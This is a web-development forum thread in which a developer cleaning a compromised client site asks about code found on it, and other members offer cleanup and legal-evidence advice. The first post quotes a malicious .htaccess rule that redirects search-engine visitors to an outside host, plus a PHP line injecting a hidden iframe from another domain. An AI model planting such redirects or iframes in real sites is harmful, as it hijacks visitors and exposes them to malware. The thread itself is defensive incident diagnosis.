Forum Moderators: phranque
I've now gained access to their hosting control panel and can now see htaccess files(not able to see in FTP program like other hosting)
This is what I found in the htacess file and example.com is their actual domain
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http: //us-euro.biz/in.cgi?4¶meter=example.com [R,L] -space added to de-link
I've never seen anything like this before, but at first glance it looks like a possible remote attack from the CGI script on that server when one of the major referers are used...but it looks like it doesn't belong regardless.
When I was notified of a virus today I found an index.php file in the "photos" directory had the following code that cleared the virus when removed.
echo "<iframe src=\"http://live-counter.net/?click=8645812\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
I would appreciate it if someone could shed some light on the htaccess before I remove it.
Thank you
In your FTP program have you unticked the box "hide filenames that begin with a dot"? The .htaccess file should then show up.
You can safely download them to your computer as long as they are in fact plain-text .htaccess files. Your client may wish to do this in order to pursue legal action -- This may have been done by a former employee, for example, rather than an outside 'hacker'. They would also want to request (through their attorney) that the host retain a copy of a backup taken before you started work on this site, for evidentiary use.
Jim
g1smd
I was on the right track, thank you for your clarification on what specifically the htaccess was doing. As far as not seeing .htaccess files in FTP program I double checked and no settings were changed. The program I'm using stores multiple logins so I jumped over to a known server that has an .htaccess file and it showed. For now, I can at least remove them from the server through the control panel.
jdMorgan
You bring up some interesting points. In talking to the site owner I suggested that "I don't know why anyone would target your site specifically" just to leave the conversation open knowing that anything can happen like this and it was suggested that it could have been a former employee. This was never mentioned in the first round of cleanup, so I didn't question but they may have someone in mind.
Just as you suggested right when I took the site over I changed the FTP passwords, but as I was going to mention it to them they asked if I could change it "right away"(speculation, but almost a hint that they were fearful)
You mentioned the backup, which I think could help developers as well! If you begin to work on a site and there is a history of viruses, a backup would be nice for the developers protection as well. That way the developer will know they are protected from accusations since anything can happen in business.
